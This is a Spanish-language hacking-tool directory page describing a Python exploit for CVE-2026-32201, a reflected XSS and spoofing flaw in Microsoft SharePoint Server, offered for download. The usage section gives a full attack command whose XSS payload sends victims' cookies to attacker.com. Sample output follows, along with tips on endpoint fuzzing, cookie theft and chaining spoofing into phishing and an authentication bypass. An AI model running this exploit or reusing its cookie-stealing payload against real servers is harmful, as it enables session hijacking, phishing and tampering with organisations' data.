Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-32201-exploit — Exploit en Python para CVE-2026-32201, un XSS reflejado en Microsoft SharePoint Server, que permite la suplantación no autenticada y la modificación de datos mediante solicitudes HTTP manipuladas. | Kitploit
Herramientas/GitHubGitHub/b1tbit/cve-2026-32201-exploit
Herramientas de PhishingAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubb1tbit/cve-2026-32201-exploit

CVE-2026-32201-exploit

Exploit en Python para CVE-2026-32201, un XSS reflejado en Microsoft SharePoint Server, que permite la suplantación no autenticada y la modificación de datos mediante solicitudes HTTP manipuladas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
16hace 4 mesesAún no revisado

Resumen

Exploit en Python para CVE-2026-32201 - validación de entrada incorrecta en Microsoft SharePoint Server, que permite suplantación de red no autenticada (C:L/I:L).

  • Afecta: SharePoint Server 2016 Enterprise, 2019, Subscription Edition < 16.0.19725.20210;
  • Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N;
  • Impacto: Ver/modificar datos sensibles mediante notificaciones/documentos suplantados.

Características

  1. Detección de huellas de SharePoint.
  2. POST manipulado para omitir la validación de entrada (sender_override).
  3. Payload personalizable (remitente, destinatario, asunto, mensaje con XSS).
  4. Análisis de respuesta para verificación.

Uso

  1. Guárdalo como exploit.py
  2. Ejecútalo para crear un archivo de modelo malicioso:
root@kitploit:~
python3 exploit.py https://sharepoint.target.com \
  --recipient [email protected] \
  --sender "[email protected]" \
  --message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
  --endpoint /_layouts/15/notify.aspx

Ejemplo de salida:

root@kitploit:~
[+] SharePoint detectado.
[*] Enviando solicitud suplantada a https://target.com/_layouts/15/notify.aspx
[+] Estado: 200
[+] Éxito potencial: Revisa los registros/correos del objetivo para ver el contenido suplantado.

Personalización

  • Fuzzing de endpoints: ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt
  • Payload XSS: Agrega JS en --message para el robo de cookies
  • Encadenamiento: Suplantación → enlace de phishing → omisión de autenticación

Verificación

  • Indicadores de éxito: 200 OK + "sent/success" en la respuesta
  • Lado del servidor: Revisa los registros ULS/registros IIS para solicitudes anómalas
  • Impacto: Monitorea correos/documentos por remitente falsificado, prueba la modificación de datos
Descargar herramienta